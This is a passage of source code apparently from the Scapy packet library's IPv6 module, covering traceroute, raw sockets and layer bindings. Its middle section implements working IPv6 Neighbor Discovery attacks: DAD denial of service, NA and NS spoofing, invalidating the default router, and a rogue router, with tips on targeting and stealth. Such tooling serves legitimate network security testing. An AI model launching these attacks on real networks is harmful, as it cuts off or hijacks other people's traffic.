3409 def _resolve_one(self, ip): 

3410 """ 

3411 overloaded version to provide a Whois resolution on the 

3412 embedded IPv4 address if the address is 6to4 or Teredo. 

3413 Otherwise, the native IPv6 address is passed. 

3414 """ 

3415 

3416 if in6_isaddr6to4(ip): # for 6to4, use embedded @ 

3417 tmp = inet_pton(socket.AF_INET6, ip) 

3418 addr = inet_ntop(socket.AF_INET, tmp[2:6]) 

3419 elif in6_isaddrTeredo(ip): # for Teredo, use mapped address 

3420 addr = teredoAddrExtractInfo(ip)[2] 

3421 else: 

3422 addr = ip 

3423 

3424 _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) 

3425 

3426 if asn.startswith("AS"): 

3427 try: 

3428 asn = int(asn[2:]) 

3429 except ValueError: 

3430 pass 

3431 

3432 return ip, asn, desc 

3433 

3434 

3435class TracerouteResult6(TracerouteResult): 

3436 __slots__ = [] 

3437 

3438 def show(self): 

3439 return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! # noqa: E501 

3440 s.hlim, 

3441 r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 

3442 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 

3443 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 

3444 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 

3445 

3446 def get_trace(self): 

3447 trace = {} 

3448 

3449 for s, r in self.res: 

3450 if IPv6 not in s: 

3451 continue 

3452 d = s[IPv6].dst 

3453 if d not in trace: 

3454 trace[d] = {} 

3455 

3456 t = not (ICMPv6TimeExceeded in r or 

3457 ICMPv6DestUnreach in r or 

3458 ICMPv6PacketTooBig in r or 

3459 ICMPv6ParamProblem in r) 

3460 

3461 trace[d][s[IPv6].hlim] = r[IPv6].src, t 

3462 

3463 for k in trace.values(): 

3464 try: 

3465 m = min(x for x, y in k.items() if y[1]) 

3466 except ValueError: 

3467 continue 

3468 for li in list(k): # use list(): k is modified in the loop 

3469 if li > m: 

3470 del k[li] 

3471 

3472 return trace 

3473 

3474 def graph(self, ASres=AS_resolver6(), **kargs): 

3475 TracerouteResult.graph(self, ASres=ASres, **kargs) 

3476 

3477 

3478@conf.commands.register 

3479def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), 

3480 l4=None, timeout=2, verbose=None, **kargs): 

3481 """Instant TCP traceroute using IPv6 

3482 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None 

3483 """ 

3484 if verbose is None: 

3485 verbose = conf.verb 

3486 

3487 if l4 is None: 

3488 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 

3489 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 

3490 else: 

3491 a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, 

3492 timeout=timeout, verbose=verbose, **kargs) 

3493 

3494 a = TracerouteResult6(a.res) 

3495 

3496 if verbose: 

3497 a.show() 

3498 

3499 return a, b 

3500 

3501############################################################################# 

3502############################################################################# 

3503# Sockets # 

3504############################################################################# 

3505############################################################################# 

3506 

3507 

3508if not WINDOWS: 

3509 from scapy.supersocket import L3RawSocket 

3510 

3511 class L3RawSocket6(L3RawSocket): 

3512 def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 

3513 # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 

3514 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 

3515 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 

3516 self.iface = iface 

3517 

3518 

3519def IPv6inIP(dst='203.178.135.36', src=None): 

3520 _IPv6inIP.dst = dst 

3521 _IPv6inIP.src = src 

3522 if not conf.L3socket == _IPv6inIP: 

3523 _IPv6inIP.cls = conf.L3socket 

3524 else: 

3525 del conf.L3socket 

3526 return _IPv6inIP 

3527 

3528 

3529class _IPv6inIP(SuperSocket): 

3530 dst = '127.0.0.1' 

3531 src = None 

3532 cls = None 

3533 

3534 def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 

3535 SuperSocket.__init__(self, family, type, proto) 

3536 self.worker = self.cls(**args) 

3537 

3538 def set(self, dst, src=None): 

3539 _IPv6inIP.src = src 

3540 _IPv6inIP.dst = dst 

3541 

3542 def nonblock_recv(self): 

3543 p = self.worker.nonblock_recv() 

3544 return self._recv(p) 

3545 

3546 def recv(self, x): 

3547 p = self.worker.recv(x) 

3548 return self._recv(p, x) 

3549 

3550 def _recv(self, p, x=MTU): 

3551 if p is None: 

3552 return p 

3553 elif isinstance(p, IP): 

3554 # TODO: verify checksum 

3555 if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: 

3556 if isinstance(p.payload, IPv6): 

3557 return p.payload 

3558 return p 

3559 

3560 def send(self, x): 

3561 return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 

3562 

3563 

3564############################################################################# 

3565############################################################################# 

3566# Neighbor Discovery Protocol Attacks # 

3567############################################################################# 

3568############################################################################# 

3569 

3570def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, 

3571 tgt_filter=None, reply_mac=None): 

3572 """ 

3573 Internal generic helper accepting a specific callback as first argument, 

3574 for NS or NA reply. See the two specific functions below. 

3575 """ 

3576 

3577 def is_request(req, mac_src_filter, tgt_filter): 

3578 """ 

3579 Check if packet req is a request 

3580 """ 

3581 

3582 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3583 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3584 return 0 

3585 

3586 # Get and compare the MAC address 

3587 mac_src = req[Ether].src 

3588 if mac_src_filter and mac_src != mac_src_filter: 

3589 return 0 

3590 

3591 # Source must be the unspecified address 

3592 if req[IPv6].src != "::": 

3593 return 0 

3594 

3595 # Check destination is the link-local solicited-node multicast 

3596 # address associated with target address in received NS 

3597 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3598 if tgt_filter and tgt != tgt_filter: 

3599 return 0 

3600 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) 

3601 expected_snma = in6_getnsma(tgt) 

3602 if received_snma != expected_snma: 

3603 return 0 

3604 

3605 return 1 

3606 

3607 if not iface: 

3608 iface = conf.iface 

3609 

3610 # To prevent sniffing our own traffic 

3611 if not reply_mac: 

3612 reply_mac = get_if_hwaddr(iface) 

3613 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3614 

3615 sniff(store=0, 

3616 filter=sniff_filter, 

3617 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3618 prn=lambda x: reply_callback(x, reply_mac, iface), 

3619 iface=iface) 

3620 

3621 

3622def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, 

3623 reply_mac=None): 

3624 """ 

3625 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3626 3756. This is done by listening incoming NS messages sent from the 

3627 unspecified address and sending a NS reply for the target address, 

3628 leading the peer to believe that another node is also performing DAD 

3629 for that address. 

3630 

3631 By default, the fake NS sent to create the DoS uses: 

3632 - as target address the target address found in received NS. 

3633 - as IPv6 source address: the unspecified address (::). 

3634 - as IPv6 destination address: the link-local solicited-node multicast 

3635 address derived from the target address in received NS. 

3636 - the mac address of the interface as source (or reply_mac, see below). 

3637 - the multicast mac address derived from the solicited node multicast 

3638 address used as IPv6 destination address. 

3639 

3640 Following arguments can be used to change the behavior: 

3641 

3642 iface: a specific interface (e.g. "eth0") of the system on which the 

3643 DoS should be launched. If None is provided conf.iface is used. 

3644 

3645 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3646 Only NS messages received from this source will trigger replies. 

3647 This allows limiting the effects of the DoS to a single target by 

3648 filtering on its mac address. The default value is None: the DoS 

3649 is not limited to a specific mac address. 

3650 

3651 tgt_filter: Same as previous but for a specific target IPv6 address for 

3652 received NS. If the target address in the NS message (not the IPv6 

3653 destination address) matches that address, then a fake reply will 

3654 be sent, i.e. the emitter will be a target of the DoS. 

3655 

3656 reply_mac: allow specifying a specific source mac address for the reply, 

3657 i.e. to prevent the use of the mac address of the interface. 

3658 """ 

3659 

3660 def ns_reply_callback(req, reply_mac, iface): 

3661 """ 

3662 Callback that reply to a NS by sending a similar NS 

3663 """ 

3664 

3665 # Let's build a reply and send it 

3666 mac = req[Ether].src 

3667 dst = req[IPv6].dst 

3668 tgt = req[ICMPv6ND_NS].tgt 

3669 rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 

3670 sendp(rep, iface=iface, verbose=0) 

3671 

3672 print("Reply NS for target address %s (received from %s)" % (tgt, mac)) 

3673 

3674 _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, 

3675 tgt_filter, reply_mac) 

3676 

3677 

3678def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, 

3679 reply_mac=None): 

3680 """ 

3681 Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 

3682 3756. This is done by listening incoming NS messages *sent from the 

3683 unspecified address* and sending a NA reply for the target address, 

3684 leading the peer to believe that another node is also performing DAD 

3685 for that address. 

3686 

3687 By default, the fake NA sent to create the DoS uses: 

3688 - as target address the target address found in received NS. 

3689 - as IPv6 source address: the target address found in received NS. 

3690 - as IPv6 destination address: the link-local solicited-node multicast 

3691 address derived from the target address in received NS. 

3692 - the mac address of the interface as source (or reply_mac, see below). 

3693 - the multicast mac address derived from the solicited node multicast 

3694 address used as IPv6 destination address. 

3695 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled 

3696 with the mac address used as source of the NA. 

3697 

3698 Following arguments can be used to change the behavior: 

3699 

3700 iface: a specific interface (e.g. "eth0") of the system on which the 

3701 DoS should be launched. If None is provided conf.iface is used. 

3702 

3703 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3704 Only NS messages received from this source will trigger replies. 

3705 This allows limiting the effects of the DoS to a single target by 

3706 filtering on its mac address. The default value is None: the DoS 

3707 is not limited to a specific mac address. 

3708 

3709 tgt_filter: Same as previous but for a specific target IPv6 address for 

3710 received NS. If the target address in the NS message (not the IPv6 

3711 destination address) matches that address, then a fake reply will 

3712 be sent, i.e. the emitter will be a target of the DoS. 

3713 

3714 reply_mac: allow specifying a specific source mac address for the reply, 

3715 i.e. to prevent the use of the mac address of the interface. This 

3716 address will also be used in the Target Link-Layer Address option. 

3717 """ 

3718 

3719 def na_reply_callback(req, reply_mac, iface): 

3720 """ 

3721 Callback that reply to a NS with a NA 

3722 """ 

3723 

3724 # Let's build a reply and send it 

3725 mac = req[Ether].src 

3726 dst = req[IPv6].dst 

3727 tgt = req[ICMPv6ND_NS].tgt 

3728 rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) 

3729 rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 

3730 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3731 sendp(rep, iface=iface, verbose=0) 

3732 

3733 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3734 

3735 _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, 

3736 tgt_filter, reply_mac) 

3737 

3738 

3739def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, 

3740 reply_mac=None, router=False): 

3741 """ 

3742 The main purpose of this function is to send fake Neighbor Advertisement 

3743 messages to a victim. As the emission of unsolicited Neighbor Advertisement 

3744 is pretty pointless (from an attacker standpoint) because it will not 

3745 lead to a modification of a victim's neighbor cache, the function send 

3746 advertisements in response to received NS (NS sent as part of the DAD, 

3747 i.e. with an unspecified address as source, are not considered). 

3748 

3749 By default, the fake NA sent to create the DoS uses: 

3750 - as target address the target address found in received NS. 

3751 - as IPv6 source address: the target address 

3752 - as IPv6 destination address: the source IPv6 address of received NS 

3753 message. 

3754 - the mac address of the interface as source (or reply_mac, see below). 

3755 - the source mac address of the received NS as destination macs address 

3756 of the emitted NA. 

3757 - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) 

3758 filled with the mac address used as source of the NA. 

3759 

3760 Following arguments can be used to change the behavior: 

3761 

3762 iface: a specific interface (e.g. "eth0") of the system on which the 

3763 DoS should be launched. If None is provided conf.iface is used. 

3764 

3765 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

3766 Only NS messages received from this source will trigger replies. 

3767 This allows limiting the effects of the DoS to a single target by 

3768 filtering on its mac address. The default value is None: the DoS 

3769 is not limited to a specific mac address. 

3770 

3771 tgt_filter: Same as previous but for a specific target IPv6 address for 

3772 received NS. If the target address in the NS message (not the IPv6 

3773 destination address) matches that address, then a fake reply will 

3774 be sent, i.e. the emitter will be a target of the DoS. 

3775 

3776 reply_mac: allow specifying a specific source mac address for the reply, 

3777 i.e. to prevent the use of the mac address of the interface. This 

3778 address will also be used in the Target Link-Layer Address option. 

3779 

3780 router: by the default (False) the 'R' flag in the NA used for the reply 

3781 is not set. If the parameter is set to True, the 'R' flag in the 

3782 NA is set, advertising us as a router. 

3783 

3784 Please, keep the following in mind when using the function: for obvious 

3785 reasons (kernel space vs. Python speed), when the target of the address 

3786 resolution is on the link, the sender of the NS receives 2 NA messages 

3787 in a row, the valid one and our fake one. The second one will overwrite 

3788 the information provided by the first one, i.e. the natural latency of 

3789 Scapy helps here. 

3790 

3791 In practice, on a common Ethernet link, the emission of the NA from the 

3792 genuine target (kernel stack) usually occurs in the same millisecond as 

3793 the receipt of the NS. The NA generated by Scapy6 will usually come after 

3794 something 20+ ms. On a usual testbed for instance, this difference is 

3795 sufficient to have the first data packet sent from the victim to the 

3796 destination before it even receives our fake NA. 

3797 """ 

3798 

3799 def is_request(req, mac_src_filter, tgt_filter): 

3800 """ 

3801 Check if packet req is a request 

3802 """ 

3803 

3804 # Those simple checks are based on Section 5.4.2 of RFC 4862 

3805 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): 

3806 return 0 

3807 

3808 mac_src = req[Ether].src 

3809 if mac_src_filter and mac_src != mac_src_filter: 

3810 return 0 

3811 

3812 # Source must NOT be the unspecified address 

3813 if req[IPv6].src == "::": 

3814 return 0 

3815 

3816 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) 

3817 if tgt_filter and tgt != tgt_filter: 

3818 return 0 

3819 

3820 dst = req[IPv6].dst 

3821 if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. 

3822 

3823 # If this is a real address resolution NS, then the destination 

3824 # address of the packet is the link-local solicited node multicast 

3825 # address associated with the target of the NS. 

3826 # Otherwise, the NS is a NUD related one, i.e. the peer is 

3827 # unicasting the NS to check the target is still alive (L2 

3828 # information is still in its cache and it is verified) 

3829 received_snma = inet_pton(socket.AF_INET6, dst) 

3830 expected_snma = in6_getnsma(tgt) 

3831 if received_snma != expected_snma: 

3832 print("solicited node multicast @ does not match target @!") 

3833 return 0 

3834 

3835 return 1 

3836 

3837 def reply_callback(req, reply_mac, router, iface): 

3838 """ 

3839 Callback that reply to a NS with a spoofed NA 

3840 """ 

3841 

3842 # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and 

3843 # send it back. 

3844 mac = req[Ether].src 

3845 pkt = req[IPv6] 

3846 src = pkt.src 

3847 tgt = req[ICMPv6ND_NS].tgt 

3848 rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) 

3849 # Use the target field from the NS 

3850 rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 

3851 

3852 # "If the solicitation IP Destination Address is not a multicast 

3853 # address, the Target Link-Layer Address option MAY be omitted" 

3854 # Given our purpose, we always include it. 

3855 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) 

3856 

3857 sendp(rep, iface=iface, verbose=0) 

3858 

3859 print("Reply NA for target address %s (received from %s)" % (tgt, mac)) 

3860 

3861 if not iface: 

3862 iface = conf.iface 

3863 # To prevent sniffing our own traffic 

3864 if not reply_mac: 

3865 reply_mac = get_if_hwaddr(iface) 

3866 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

3867 

3868 router = 1 if router else 0 # Value of the R flags in NA 

3869 

3870 sniff(store=0, 

3871 filter=sniff_filter, 

3872 lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), 

3873 prn=lambda x: reply_callback(x, reply_mac, router, iface), 

3874 iface=iface) 

3875 

3876 

3877def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", 

3878 dst=None, src_mac=None, dst_mac=None, loop=True, 

3879 inter=1, iface=None): 

3880 """ 

3881 The main purpose of this function is to send fake Neighbor Solicitations 

3882 messages to a victim, in order to either create a new entry in its neighbor 

3883 cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated 

3884 that a node SHOULD create the entry or update an existing one (if it is not 

3885 currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 

3886 state is set to STALE. 

3887 

3888 The two main parameters of the function are the source link-layer address 

3889 (carried by the Source Link-Layer Address option in the NS) and the 

3890 source address of the packet. 

3891 

3892 Unlike some other NDP_Attack_* function, this one is not based on a 

3893 stimulus/response model. When called, it sends the same NS packet in loop 

3894 every second (the default) 

3895 

3896 Following arguments can be used to change the format of the packets: 

3897 

3898 src_lladdr: the MAC address used in the Source Link-Layer Address option 

3899 included in the NS packet. This is the address that the peer should 

3900 associate in its neighbor cache with the IPv6 source address of the 

3901 packet. If None is provided, the mac address of the interface is 

3902 used. 

3903 

3904 src: the IPv6 address used as source of the packet. If None is provided, 

3905 an address associated with the emitting interface will be used 

3906 (based on the destination address of the packet). 

3907 

3908 target: the target address of the NS packet. If no value is provided, 

3909 a dummy address (2001:db8::1) is used. The value of the target 

3910 has a direct impact on the destination address of the packet if it 

3911 is not overridden. By default, the solicited-node multicast address 

3912 associated with the target is used as destination address of the 

3913 packet. Consider specifying a specific destination address if you 

3914 intend to use a target address different than the one of the victim. 

3915 

3916 dst: The destination address of the NS. By default, the solicited node 

3917 multicast address associated with the target address (see previous 

3918 parameter) is used if no specific value is provided. The victim 

3919 is not expected to check the destination address of the packet, 

3920 so using a multicast address like ff02::1 should work if you want 

3921 the attack to target all hosts on the link. On the contrary, if 

3922 you want to be more stealth, you should provide the target address 

3923 for this parameter in order for the packet to be sent only to the 

3924 victim. 

3925 

3926 src_mac: the MAC address used as source of the packet. By default, this 

3927 is the address of the interface. If you want to be more stealth, 

3928 feel free to use something else. Note that this address is not the 

3929 that the victim will use to populate its neighbor cache. 

3930 

3931 dst_mac: The MAC address used as destination address of the packet. If 

3932 the IPv6 destination address is multicast (all-nodes, solicited 

3933 node, ...), it will be computed. If the destination address is 

3934 unicast, a neighbor solicitation will be performed to get the 

3935 associated address. If you want the attack to be stealth, you 

3936 can provide the MAC address using this parameter. 

3937 

3938 loop: By default, this parameter is True, indicating that NS packets 

3939 will be sent in loop, separated by 'inter' seconds (see below). 

3940 When set to False, a single packet is sent. 

3941 

3942 inter: When loop parameter is True (the default), this parameter provides 

3943 the interval in seconds used for sending NS packets. 

3944 

3945 iface: to force the sending interface. 

3946 """ 

3947 

3948 if not iface: 

3949 iface = conf.iface 

3950 

3951 # Use provided MAC address as source link-layer address option 

3952 # or the MAC address of the interface if none is provided. 

3953 if not src_lladdr: 

3954 src_lladdr = get_if_hwaddr(iface) 

3955 

3956 # Prepare packets parameters 

3957 ether_params = {} 

3958 if src_mac: 

3959 ether_params["src"] = src_mac 

3960 

3961 if dst_mac: 

3962 ether_params["dst"] = dst_mac 

3963 

3964 ipv6_params = {} 

3965 if src: 

3966 ipv6_params["src"] = src 

3967 if dst: 

3968 ipv6_params["dst"] = dst 

3969 else: 

3970 # Compute the solicited-node multicast address 

3971 # associated with the target address. 

3972 tmp = inet_ntop(socket.AF_INET6, 

3973 in6_getnsma(inet_pton(socket.AF_INET6, target))) 

3974 ipv6_params["dst"] = tmp 

3975 

3976 pkt = Ether(**ether_params) 

3977 pkt /= IPv6(**ipv6_params) 

3978 pkt /= ICMPv6ND_NS(tgt=target) 

3979 pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) 

3980 

3981 sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) 

3982 

3983 

3984def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, 

3985 ip_src_filter=None, reply_mac=None, 

3986 tgt_mac=None): 

3987 """ 

3988 The purpose of the function is to monitor incoming RA messages 

3989 sent by default routers (RA with a non-zero Router Lifetime values) 

3990 and invalidate them by immediately replying with fake RA messages 

3991 advertising a zero Router Lifetime value. 

3992 

3993 The result on receivers is that the router is immediately invalidated, 

3994 i.e. the associated entry is discarded from the default router list 

3995 and destination cache is updated to reflect the change. 

3996 

3997 By default, the function considers all RA messages with a non-zero 

3998 Router Lifetime value but provides configuration knobs to allow 

3999 filtering RA sent by specific routers (Ethernet source address). 

4000 With regard to emission, the multicast all-nodes address is used 

4001 by default but a specific target can be used, in order for the DoS to 

4002 apply only to a specific host. 

4003 

4004 More precisely, following arguments can be used to change the behavior: 

4005 

4006 iface: a specific interface (e.g. "eth0") of the system on which the 

4007 DoS should be launched. If None is provided conf.iface is used. 

4008 

4009 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4010 Only RA messages received from this source will trigger replies. 

4011 If other default routers advertised their presence on the link, 

4012 their clients will not be impacted by the attack. The default 

4013 value is None: the DoS is not limited to a specific mac address. 

4014 

4015 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4016 on. Only RA messages received from this source address will trigger 

4017 replies. If other default routers advertised their presence on the 

4018 link, their clients will not be impacted by the attack. The default 

4019 value is None: the DoS is not limited to a specific IPv6 source 

4020 address. 

4021 

4022 reply_mac: allow specifying a specific source mac address for the reply, 

4023 i.e. to prevent the use of the mac address of the interface. 

4024 

4025 tgt_mac: allow limiting the effect of the DoS to a specific host, 

4026 by sending the "invalidating RA" only to its mac address. 

4027 """ 

4028 

4029 def is_request(req, mac_src_filter, ip_src_filter): 

4030 """ 

4031 Check if packet req is a request 

4032 """ 

4033 

4034 if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): 

4035 return 0 

4036 

4037 mac_src = req[Ether].src 

4038 if mac_src_filter and mac_src != mac_src_filter: 

4039 return 0 

4040 

4041 ip_src = req[IPv6].src 

4042 if ip_src_filter and ip_src != ip_src_filter: 

4043 return 0 

4044 

4045 # Check if this is an advertisement for a Default Router 

4046 # by looking at Router Lifetime value 

4047 if req[ICMPv6ND_RA].routerlifetime == 0: 

4048 return 0 

4049 

4050 return 1 

4051 

4052 def ra_reply_callback(req, reply_mac, tgt_mac, iface): 

4053 """ 

4054 Callback that sends an RA with a 0 lifetime 

4055 """ 

4056 

4057 # Let's build a reply and send it 

4058 

4059 src = req[IPv6].src 

4060 

4061 # Prepare packets parameters 

4062 ether_params = {} 

4063 if reply_mac: 

4064 ether_params["src"] = reply_mac 

4065 

4066 if tgt_mac: 

4067 ether_params["dst"] = tgt_mac 

4068 

4069 # Basis of fake RA (high pref, zero lifetime) 

4070 rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") 

4071 rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) 

4072 

4073 # Add it a PIO from the request ... 

4074 tmp = req 

4075 while ICMPv6NDOptPrefixInfo in tmp: 

4076 pio = tmp[ICMPv6NDOptPrefixInfo] 

4077 tmp = pio.payload 

4078 del pio.payload 

4079 rep /= pio 

4080 

4081 # ... and source link layer address option 

4082 if ICMPv6NDOptSrcLLAddr in req: 

4083 mac = req[ICMPv6NDOptSrcLLAddr].lladdr 

4084 else: 

4085 mac = req[Ether].src 

4086 rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) 

4087 

4088 sendp(rep, iface=iface, verbose=0) 

4089 

4090 print("Fake RA sent with source address %s" % src) 

4091 

4092 if not iface: 

4093 iface = conf.iface 

4094 # To prevent sniffing our own traffic 

4095 if not reply_mac: 

4096 reply_mac = get_if_hwaddr(iface) 

4097 sniff_filter = "icmp6 and not ether src %s" % reply_mac 

4098 

4099 sniff(store=0, 

4100 filter=sniff_filter, 

4101 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4102 prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), 

4103 iface=iface) 

4104 

4105 

4106def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, 

4107 ip_src_filter=None): 

4108 """ 

4109 The purpose of this function is to send provided RA message at layer 2 

4110 (i.e. providing a packet starting with IPv6 will not work) in response 

4111 to received RS messages. In the end, the function is a simple wrapper 

4112 around sendp() that monitor the link for RS messages. 

4113 

4114 It is probably better explained with an example: 

4115 

4116 >>> ra = Ether()/IPv6()/ICMPv6ND_RA() 

4117 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) 

4118 >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) 

4119 >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") 

4120 >>> NDP_Attack_Fake_Router(ra, iface="eth0") 

4121 Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 

4122 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae 

4123 ... 

4124 

4125 Following arguments can be used to change the behavior: 

4126 

4127 ra: the RA message to send in response to received RS message. 

4128 

4129 iface: a specific interface (e.g. "eth0") of the system on which the 

4130 DoS should be launched. If none is provided, conf.iface is 

4131 used. 

4132 

4133 mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. 

4134 Only RS messages received from this source will trigger a reply. 

4135 Note that no changes to provided RA is done which imply that if 

4136 you intend to target only the source of the RS using this option, 

4137 you will have to set the Ethernet destination address to the same 

4138 value in your RA. 

4139 The default value for this parameter is None: no filtering on the 

4140 source of RS is done. 

4141 

4142 ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter 

4143 on. Only RS messages received from this source address will trigger 

4144 replies. Same comment as for previous argument apply: if you use 

4145 the option, you will probably want to set a specific Ethernet 

4146 destination address in the RA. 

4147 """ 

4148 

4149 def is_request(req, mac_src_filter, ip_src_filter): 

4150 """ 

4151 Check if packet req is a request 

4152 """ 

4153 

4154 if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): 

4155 return 0 

4156 

4157 mac_src = req[Ether].src 

4158 if mac_src_filter and mac_src != mac_src_filter: 

4159 return 0 

4160 

4161 ip_src = req[IPv6].src 

4162 if ip_src_filter and ip_src != ip_src_filter: 

4163 return 0 

4164 

4165 return 1 

4166 

4167 def ra_reply_callback(req, iface): 

4168 """ 

4169 Callback that sends an RA in reply to an RS 

4170 """ 

4171 

4172 src = req[IPv6].src 

4173 sendp(ra, iface=iface, verbose=0) 

4174 print("Fake RA sent in response to RS from %s" % src) 

4175 

4176 if not iface: 

4177 iface = conf.iface 

4178 sniff_filter = "icmp6" 

4179 

4180 sniff(store=0, 

4181 filter=sniff_filter, 

4182 lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), 

4183 prn=lambda x: ra_reply_callback(x, iface), 

4184 iface=iface) 

4185 

4186############################################################################# 

4187# Pre-load classes ## 

4188############################################################################# 

4189 

4190 

4191def _get_cls(name): 

4192 return globals().get(name, Raw) 

4193 

4194 

4195def _load_dict(d): 

4196 for k, v in d.items(): 

4197 d[k] = _get_cls(v) 

4198 

4199 

4200_load_dict(icmp6ndoptscls) 

4201_load_dict(icmp6typescls) 

4202_load_dict(ipv6nhcls) 

4203 

4204############################################################################# 

4205############################################################################# 

4206# Layers binding # 

4207############################################################################# 

4208############################################################################# 

4209 

4210conf.l3types.register(ETH_P_IPV6, IPv6) 

4211conf.l3types.register_num2layer(ETH_P_ALL, IPv46) 

4212conf.l2types.register(31, IPv6) 

4213conf.l2types.register(DLT_IPV6, IPv6) 

4214conf.l2types.register(DLT_RAW, IPv46) 

4215conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46) 

4216 

4217bind_layers(Ether, IPv6, type=0x86dd) 

4218bind_layers(CookedLinux, IPv6, proto=0x86dd) 

4219bind_layers(GRE, IPv6, proto=0x86dd) 

4220bind_layers(SNAP, IPv6, code=0x86dd) 

4221# AF_INET6 values are platform-dependent. For a detailed explaination, read 

4222# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354 # noqa: E501 

4223if WINDOWS: 

4224 bind_layers(Loopback, IPv6, type=0x18) 

4225else: 

4226 bind_layers(Loopback, IPv6, type=socket.AF_INET6) 

4227bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) 

4228bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) 

4229bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) 

4230bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) 

4231bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) 

4232bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) 

4233bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) 

